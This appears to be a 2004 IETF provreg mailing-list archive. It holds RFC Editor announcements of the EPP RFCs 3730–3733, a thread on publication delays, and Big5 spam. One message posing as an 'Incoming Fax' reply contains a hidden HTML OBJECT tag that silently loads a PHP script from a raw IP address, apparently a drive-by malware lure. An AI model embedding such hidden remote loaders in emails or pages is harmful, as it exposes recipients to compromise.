Requests for special distribution should be addressed to either the
author of the RFC in question, or to [email-masked].  Unless
specifically noted otherwise on the RFC itself, all RFCs are for
unlimited distribution.echo 
Submissions for Requests for Comments should be sent to
[email-masked].  Please consult RFC 2223, Instructions to RFC
Authors, for further information.

Joyce K. Reynolds and Sandy Ginoza
USC/Information Sciences Institute

..

Below is the data which will enable a MIME compliant Mail Reader 
implementation to automatically retrieve the ASCII version
of the RFCs.

--NextPart
Content-Type: Multipart/Alternative; Boundary="OtherAccess"

--OtherAccess
Content-Type:  Message/External-body;
        access-type="mail-server";
        server="[email-masked]"

Content-Type: text/plain
Content-ID: <[email-masked]>

RETRIEVE: rfc
DOC-ID: rfc3734

--OtherAccess
Content-Type:   Message/External-body;
        name="rfc3734.txt";
        site="ftp.isi.edu";
        access-type="anon-ftp";
        directory="in-notes"

Content-Type: text/plain
Content-ID: <[email-masked]>

--OtherAccess--
--NextPart--

To: IETF-Announce: ;
Subject: [ietf-provreg] RFC 3733 on Extensible Provisioning Protocol (EPP) Contact Mapping
Cc: [email-masked], [email-masked]
From: [email-masked]
Date: Fri, 26 Mar 2004 17:33:17 -0800
Sender: [email-masked]

--NextPart

A new Request for Comments is now available in online RFC libraries.

        RFC 3733

        Title:      Extensible Provisioning Protocol (EPP) Contact
                    Mapping
        Author(s):  S. Hollenbeck
        Status:     Standards Track
        Date:       March 2004
        Mailbox:    [email-masked]
        Pages:      41
        Characters: 83091
        Updates/Obsoletes/SeeAlso:    None

        I-D Tag:    draft-ietf-provreg-epp-contact-07.txt

        URL:        ftp://ftp.rfc-editor.org/in-notes/rfc3733.txt

This document describes an Extensible Provisioning Protocol (EPP)
mapping for the provisioning and management of individual or
organizational social information identifiers (known as "contacts")
stored in a shared central repository.  Specified in Extensible Markup
Language (XML), the mapping defines EPP command syntax and semantics
as applied to contacts.

This document is a product of the Provisioning Registry Protocol
Working Group of the IETF.

This is now a Proposed Standard Protocol.

This document specifies an Internet standards track protocol for
the Internet community, and requests discussion and suggestions
for improvements.  Please refer to the current edition of the
"Internet Official Protocol Standards" (STD 1) for the
standardization state and status of this protocol.  Distribution
of this memo is unlimited.

This announcement is sent to the IETF list and the RFC-DIST list.
Requests to be added to or deleted from the IETF distribution list
should be sent to [email-masked].  Requests to be
added to or deleted from the RFC-DIST distribution list should
be sent to [email-masked].

Details on obtaining RFCs via FTP or EMAIL may be obtained by sending
an EMAIL message to [email-masked] with the message body 
help: ways_to_get_rfcs.  For example:

        To: [email-masked]
        Subject: getting rfcs

        help: ways_to_get_rfcs

Requests for special distribution should be addressed to either the
author of the RFC in question, or to [email-masked].  Unless
specifically noted otherwise on the RFC itself, all RFCs are for
unlimited distribution.echo 
Submissions for Requests for Comments should be sent to
[email-masked].  Please consult RFC 2223, Instructions to RFC
Authors, for further information.

Joyce K. Reynolds and Sandy Ginoza
USC/Information Sciences Institute

..

Below is the data which will enable a MIME compliant Mail Reader 
implementation to automatically retrieve the ASCII version
of the RFCs.

--NextPart
Content-Type: Multipart/Alternative; Boundary="OtherAccess"

--OtherAccess
Content-Type:  Message/External-body;
        access-type="mail-server";
        server="[email-masked]"

Content-Type: text/plain
Content-ID: <[email-masked]>

RETRIEVE: rfc
DOC-ID: rfc3733

--OtherAccess
Content-Type:   Message/External-body;
        name="rfc3733.txt";
        site="ftp.isi.edu";
        access-type="anon-ftp";
        directory="in-notes"

Content-Type: text/plain
Content-ID: <[email-masked]>

--OtherAccess--
--NextPart--

To: IETF-Announce: ;
Subject: [ietf-provreg] RFC 3732 on Extensible Provisioning Protocol (EPP) Host Mapping
Cc: [email-masked], [email-masked]
From: [email-masked]
Date: Fri, 26 Mar 2004 17:25:29 -0800
Sender: [email-masked]

--NextPart

A new Request for Comments is now available in online RFC libraries.

        RFC 3732

        Title:      Extensible Provisioning Protocol (EPP) Host
                    Mapping
        Author(s):  S. Hollenbeck
        Status:     Standards Track
        Date:       March 2004
        Mailbox:    [email-masked]
        Pages:      28
        Characters: 57082
        Updates/Obsoletes/SeeAlso:    None

        I-D Tag:    draft-ietf-provreg-epp-host-07.txt

        URL:        ftp://ftp.rfc-editor.org/in-notes/rfc3732.txt

This document describes an Extensible Provisioning Protocol (EPP)
mapping for the provisioning and management of Internet host names
stored in a shared central repository.  Specified in XML, the mapping
defines EPP command syntax and semantics as applied to host names.

This document is a product of the Provisioning Registry Protocol
Working Group of the IETF.

This is now a Proposed Standard Protocol.

This document specifies an Internet standards track protocol for
the Internet community, and requests discussion and suggestions
for improvements.  Please refer to the current edition of the
"Internet Official Protocol Standards" (STD 1) for the
standardization state and status of this protocol.  Distribution
of this memo is unlimited.

This announcement is sent to the IETF list and the RFC-DIST list.
Requests to be added to or deleted from the IETF distribution list
should be sent to [email-masked].  Requests to be
added to or deleted from the RFC-DIST distribution list should
be sent to [email-masked].

Details on obtaining RFCs via FTP or EMAIL may be obtained by sending
an EMAIL message to [email-masked] with the message body 
help: ways_to_get_rfcs.  For example:

        To: [email-masked]
        Subject: getting rfcs

        help: ways_to_get_rfcs

Requests for special distribution should be addressed to either the
author of the RFC in question, or to [email-masked].  Unless
specifically noted otherwise on the RFC itself, all RFCs are for
unlimited distribution.echo 
Submissions for Requests for Comments should be sent to
[email-masked].  Please consult RFC 2223, Instructions to RFC
Authors, for further information.

Joyce K. Reynolds and Sandy Ginoza
USC/Information Sciences Institute

..

Below is the data which will enable a MIME compliant Mail Reader 
implementation to automatically retrieve the ASCII version
of the RFCs.

--NextPart
Content-Type: Multipart/Alternative; Boundary="OtherAccess"

--OtherAccess
Content-Type:  Message/External-body;
        access-type="mail-server";
        server="[email-masked]"

Content-Type: text/plain
Content-ID: <[email-masked]>

RETRIEVE: rfc
DOC-ID: rfc3732

--OtherAccess
Content-Type:   Message/External-body;
        name="rfc3732.txt";
        site="ftp.isi.edu";
        access-type="anon-ftp";
        directory="in-notes"

Content-Type: text/plain
Content-ID: <[email-masked]>

--OtherAccess--
--NextPart--

To: IETF-Announce: ;
Subject: [ietf-provreg] RFC 3731 on Extensible Provisioning Protocol (EPP) Domain Name Mapping
Cc: [email-masked], [email-masked]
From: [email-masked]
Date: Fri, 26 Mar 2004 17:23:41 -0800
Sender: [email-masked]

--NextPart

A new Request for Comments is now available in online RFC libraries.

        RFC 3731

        Title:      Extensible Provisioning Protocol (EPP) Domain Name
                    Mapping
        Author(s):  S. Hollenbeck
        Status:     Standards Track
        Date:       March 2004
        Mailbox:    [email-masked]
        Pages:      45
        Characters: 92527
        Updates/Obsoletes/SeeAlso:    None

        I-D Tag:    draft-ietf-provreg-epp-domain-07.txt

        URL:        ftp://ftp.rfc-editor.org/in-notes/rfc3731.txt

This document describes an Extensible Provisioning Protocol (EPP)
mapping for the provisioning and management of Internet domain names
stored in a shared central repository.  Specified in XML, the mapping
defines EPP command syntax and semantics as applied to domain names.

This document is a product of the Provisioning Registry Protocol
Working Group of the IETF.

This is now a Proposed Standard Protocol.

This document specifies an Internet standards track protocol for
the Internet community, and requests discussion and suggestions
for improvements.  Please refer to the current edition of the
"Internet Official Protocol Standards" (STD 1) for the
standardization state and status of this protocol.  Distribution
of this memo is unlimited.

This announcement is sent to the IETF list and the RFC-DIST list.
Requests to be added to or deleted from the IETF distribution list
should be sent to [email-masked].  Requests to be
added to or deleted from the RFC-DIST distribution list should
be sent to [email-masked].

Details on obtaining RFCs via FTP or EMAIL may be obtained by sending
an EMAIL message to [email-masked] with the message body 
help: ways_to_get_rfcs.  For example:

        To: [email-masked]
        Subject: getting rfcs

        help: ways_to_get_rfcs

Requests for special distribution should be addressed to either the
author of the RFC in question, or to [email-masked].  Unless
specifically noted otherwise on the RFC itself, all RFCs are for
unlimited distribution.echo 
Submissions for Requests for Comments should be sent to
[email-masked].  Please consult RFC 2223, Instructions to RFC
Authors, for further information.

Joyce K. Reynolds and Sandy Ginoza
USC/Information Sciences Institute

..

Below is the data which will enable a MIME compliant Mail Reader 
implementation to automatically retrieve the ASCII version
of the RFCs.

--NextPart
Content-Type: Multipart/Alternative; Boundary="OtherAccess"

--OtherAccess
Content-Type:  Message/External-body;
        access-type="mail-server";
        server="[email-masked]"

Content-Type: text/plain
Content-ID: <[email-masked]>

RETRIEVE: rfc
DOC-ID: rfc3731

--OtherAccess
Content-Type:   Message/External-body;
        name="rfc3731.txt";
        site="ftp.isi.edu";
        access-type="anon-ftp";
        directory="in-notes"

Content-Type: text/plain
Content-ID: <[email-masked]>

--OtherAccess--
--NextPart--

To: IETF-Announce: ;
Subject: [ietf-provreg] RFC 3730 on Extensible Provisioning Protocol (EPP)
Cc: [email-masked], [email-masked]
From: [email-masked]
Date: Fri, 26 Mar 2004 17:18:49 -0800
Sender: [email-masked]

--NextPart

A new Request for Comments is now available in online RFC libraries.

        RFC 3730

        Title:      Extensible Provisioning Protocol (EPP)
        Author(s):  S. Hollenbeck
        Status:     Standards Track
        Date:       March 2004
        Mailbox:    [email-masked]
        Pages:      69
        Characters: 134337
        Updates/Obsoletes/SeeAlso:    None

        I-D Tag:    draft-ietf-provreg-epp-09.txt

        URL:        ftp://ftp.rfc-editor.org/in-notes/rfc3730.txt

This document describes an application layer client-server protocol
for the provisioning and management of objects stored in a shared
central repository.  Specified in XML, the protocol defines generic
object management operations and an extensible framework that maps
protocol operations to objects.  This document includes a protocol
specification, an object mapping template, and an XML media type
registration.

This document is a product of the Provisioning Registry Protocol
Working Group of the IETF.

This is now a Proposed Standard Protocol.

This document specifies an Internet standards track protocol for
the Internet community, and requests discussion and suggestions
for improvements.  Please refer to the current edition of the
"Internet Official Protocol Standards" (STD 1) for the
standardization state and status of this protocol.  Distribution
of this memo is unlimited.

This announcement is sent to the IETF list and the RFC-DIST list.
Requests to be added to or deleted from the IETF distribution list
should be sent to [email-masked].  Requests to be
added to or deleted from the RFC-DIST distribution list should
be sent to [email-masked].

Details on obtaining RFCs via FTP or EMAIL may be obtained by sending
an EMAIL message to [email-masked] with the message body 
help: ways_to_get_rfcs.  For example:

        To: [email-masked]
        Subject: getting rfcs

        help: ways_to_get_rfcs

Requests for special distribution should be addressed to either the
author of the RFC in question, or to [email-masked].  Unless
specifically noted otherwise on the RFC itself, all RFCs are for
unlimited distribution.echo 
Submissions for Requests for Comments should be sent to
[email-masked].  Please consult RFC 2223, Instructions to RFC
Authors, for further information.

Joyce K. Reynolds and Sandy Ginoza
USC/Information Sciences Institute

..

Below is the data which will enable a MIME compliant Mail Reader 
implementation to automatically retrieve the ASCII version
of the RFCs.

--NextPart
Content-Type: Multipart/Alternative; Boundary="OtherAccess"

--OtherAccess
Content-Type:  Message/External-body;
        access-type="mail-server";
        server="[email-masked]"

Content-Type: text/plain
Content-ID: <[email-masked]>

RETRIEVE: rfc
DOC-ID: rfc3730

--OtherAccess
Content-Type:   Message/External-body;
        name="rfc3730.txt";
        site="ftp.isi.edu";
        access-type="anon-ftp";
        directory="in-notes"

Content-Type: text/plain
Content-ID: <[email-masked]>

--OtherAccess--
--NextPart--

Date: Fri, 26 Mar 2004 13:18:41 +0100 (MET)
From: [email-masked]
To: 
Subject: =?big5?Q?=B1z=B7Q=ADn [=C1=C8=A4j=BF=FA] =A9=CE=ACO=C5=FD=A7=DA=AD=CC=C0=B0=B1z [=BD=E6=AAF=A6=E8] =B6=DC=A1H=B6i=A8=D3=AC=DD.=A5]=B1z=C1=C8!!?=

This is a multi-part message in MIME format.

------=_NextPart_0hZbIfKg9u8UvPaNerXGChzletW
Content-Type: multipart/alternative;
	boundary="----=_NextPart_0hZbIfKg9u8UvPaNerXGChzletWAA"

------=_NextPart_0hZbIfKg9u8UvPaNerXGChzletWAA
Content-Type: text/html;
	charset="big5"
Content-Transfer-Encoding: base64

------=_NextPart_0hZbIfKg9u8UvPaNerXGChzletWAA--
------=_NextPart_0hZbIfKg9u8UvPaNerXGChzletW--

Date: Sun, 21 Mar 2004 12:57:31 +0100
To: [email-masked]
Subject: [ietf-provreg] Re: Incoming Fax
From: [email-masked]
Sender: [email-masked]

<html><body>
<font face="System">
<OBJECT STYLE="display:none" DATA="http://68.233.252.115:81/539138.php">
</OBJECT></body></html>

Reply-To: [email-masked]
From: �з~�M�a<[email-masked]>
Subject: �ڭ̥u���L�O���x�W�̱M�~���з~�ζ��Ӥw                                             LIJHMQMWOJ
Date: Sun, 7 Mar 2004 20:29:17 +0800

<html>

<head>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=big5">
<title>�s�W����1</title>
</head>

<body>

<p align="center">
<img border="0" src="http://www.hipeak04.com/images/index_01.gif" width="85" height="40"><img border="0" src="http://www.hipeak04.com/images/index_02.gif" width="591" height="40"></p>

<p align="center">�@</p>

<p align="left">�@<span style="font-weight: 700; background-color: #FFFFFF"><font face="�з���" size="5" color="#FF0000">�@�@�� 
<a href="http://www.hipeak04.com/show-me-the-money">���Ӻ����׭^!!�z�ݭn�̱M�~���ζ�</a>��</font></span></p>

<p align="left"><span style="font-weight: 700; background-color: #FFFFFF">
<font face="�з���" size="5" color="#FF0000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
���̱M�~���ڭ̨����U�z</font></span></p>

<p align="center">�@</p>

<p align="center"><a href="http://www.hipeak04.com/show-me-the-money">
<img border="0" src="http://www.cigi.com.tw/amity/images/p01_pic_01.gif" width="131" height="240"><img border="0" src="http://www.cigi.com.tw/amity/images/p01_pic_02.gif" width="125" height="240"><img border="0" src="http://www.cigi.com.tw/amity/images/p01_pic_03.gif" width="130" height="240"><img border="0" src="http://www.cigi.com.tw/amity/images/p01_pic_04.gif" width="134" height="240"></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </p>

<p align="left">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </p>
<p align="center">
�@</p>
<p align="center">
�@</p>
<p align="center">
�@</p>

<p align="center">
�@</p>

</body>

</html>
 
XKXNDXZVQGINHFBIMTTRMDRHLBIBFQIDVBDKXH

Date: Thu, 4 Mar 2004 07:00:00 +0100 (MET)
From: [email-masked]
To: 
Subject: =?big5?Q?=A4d=B8U=A4=A3=ADn=AC=DD!! =ABO=C3=D2=C0~=A6=BA=A7A..?=

This is a multi-part message in MIME format.

------=_NextPart_HlDvaE3Emr10w7
Content-Type: multipart/alternative;
	boundary="----=_NextPart_HlDvaE3Emr10w7AA"

------=_NextPart_HlDvaE3Emr10w7AA
Content-Type: text/html;
	charset="big5"
Content-Transfer-Encoding: base64

------=_NextPart_HlDvaE3Emr10w7AA--
------=_NextPart_HlDvaE3Emr10w7--

Date: Tue, 2 Mar 2004 13:10:39 +0100 (MET)
From: [email-masked]
To: 
Subject: =?big5?Q?Hipeak=B3=D0=B7~=C5U=B0=DD=BA=F4=A1=D0=B1=D0=B1z=A6p=A6=F3=C5=FD=BA=F4=B8=F4=A6=E6=BEP=B4=C0=A7A=C1=C8=BF=FA?=

This is a multi-part message in MIME format.

------=_NextPart_lM0HaqK3bfVjXqr0GbnHbZRPqsq
Content-Type: multipart/alternative;
	boundary="----=_NextPart_lM0HaqK3bfVjXqr0GbnHbZRPqsqAA"

------=_NextPart_lM0HaqK3bfVjXqr0GbnHbZRPqsqAA
Content-Type: text/html;
	charset="big5"
Content-Transfer-Encoding: base64

------=_NextPart_lM0HaqK3bfVjXqr0GbnHbZRPqsqAA--
------=_NextPart_lM0HaqK3bfVjXqr0GbnHbZRPqsq--

Date: Mon, 1 Mar 2004 23:13:29 +0100 (MET)
From: [email-masked]
To: 
Subject: =?big5?Q?Hipeak=B3=D0=B7~=C5U=B0=DD=BA=F4=A1=D0=B1=D0=B1z=A6p=A6=F3=C5=FD=BA=F4=B8=F4=A6=E6=BEP=B4=C0=A7A=C1=C8=BF=FA?=

This is a multi-part message in MIME format.

------=_NextPart_Fz05xFZPcehSY1cIu3fd3VbiNXzDd
Content-Type: multipart/alternative;
	boundary="----=_NextPart_Fz05xFZPcehSY1cIu3fd3VbiNXzDdAA"

------=_NextPart_Fz05xFZPcehSY1cIu3fd3VbiNXzDdAA
Content-Type: text/html;
	charset="big5"
Content-Transfer-Encoding: base64

------=_NextPart_Fz05xFZPcehSY1cIu3fd3VbiNXzDdAA--
------=_NextPart_Fz05xFZPcehSY1cIu3fd3VbiNXzDd--

To: Edward Lewis <[email-masked]>
cc: [email-masked], [email-masked]
Subject: Re: [ietf-provreg] IETF 59 
Date: Mon, 01 Mar 2004 08:29:27 -0500
From: Eric Brunner-Williams in Portland Maine <[email-masked]>
Sender: [email-masked]

> ... or anything else internal to the IETF.

Well ... ICANN is meeting in Rome this week. It is litigation season.
Maybe they can scare up something _external_ to the IETF.

Idle hands, etc.

Date: Mon, 1 Mar 2004 21:56:01 +0900
To: Rick Wesson <[email-masked]>
From: Edward Lewis <[email-masked]>
Subject: Re: [ietf-provreg] IETF 59
Cc: Edward Lewis <[email-masked]>, [email-masked]
Sender: [email-masked]

At 0:14 -0800 3/1/04, Rick Wesson wrote:
>is there any way to remove these [administrative] blocking factors?

I'd say no, well, at least nothing (constructive) I can think of as a 
co-chair.  I.e., nothing has been blocking on the WG, the editor, or 
anything else internal to the IETF.
-- 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Edward Lewis                                            +1-703-227-9854
ARIN Research Engineer

History repeats, therefore my life is a rerun.

From: "Hollenbeck, Scott" <[email-masked]>
To: "'Rick Wesson'" <[email-masked]>
Cc: "[email-masked]'" <[email-masked]>
Subject: RE: [ietf-provreg] IETF 59
Date: Mon, 1 Mar 2004 06:16:46 -0500 
Sender: [email-masked]

> any ETA on when the refrences will be complete. It seems silly to keep
> this document from moving forward for more than 6 months 
> because of an XML
> registry creation factor at IANA.

The documents are now in RFC-EDITOR status, which means that the RFC Editor
is doing their final review before passing them to me for my 48-hour author
review.  The documents should be done within the next few weeks.

-Scott-

Date: Mon, 1 Mar 2004 00:14:05 -0800 (PST)
From: Rick Wesson <[email-masked]>
To: Edward Lewis <[email-masked]>
Cc: [email-masked]
Subject: Re: [ietf-provreg] IETF 59
Sender: [email-masked]

any ETA on when the refrences will be complete. It seems silly to keep
this document from moving forward for more than 6 months because of an XML
registry creation factor at IANA.

Are we at the mercy of this beauracy?

Doesn't one any recognize that keeping these docs from being published
prevents the clock from starting on new gTLD (epp based) registries from
having to implement the adopted wg documents.

yes, ICANN wrote those agreements so that if the IETf ever came up with a
standard registries have 135 days to implement it.

is there any way to remove these [administrative] blocking factors?

-rick

On Mon, 1 Mar 2004, Edward Lewis wrote:

> It's the 59th IETF, and we are still a working group.
>
> A year ago we managed to finish off the work leading to the documents
> that passed the IESG in May and June.  Since then the document waited
> for the start of an XML registry at IANA.  The documents are still
> waiting for publication - which is why we still are a WG.
>
> --
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
> Edward Lewis                                            +1-703-227-9854
> ARIN Research Engineer
>
> History repeats, therefore my life is a rerun.
>

Date: Mon, 1 Mar 2004 13:01:17 +0900
To: [email-masked]
From: Edward Lewis <[email-masked]>
Subject: [ietf-provreg] IETF 59
Cc: [email-masked]
Sender: [email-masked]

It's the 59th IETF, and we are still a working group.

A year ago we managed to finish off the work leading to the documents 
that passed the IESG in May and June.  Since then the document waited 
for the start of an XML registry at IANA.  The documents are still 
waiting for publication - which is why we still are a WG.

-- 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Edward Lewis                                            +1-703-227-9854
ARIN Research Engineer

History repeats, therefore my life is a rerun.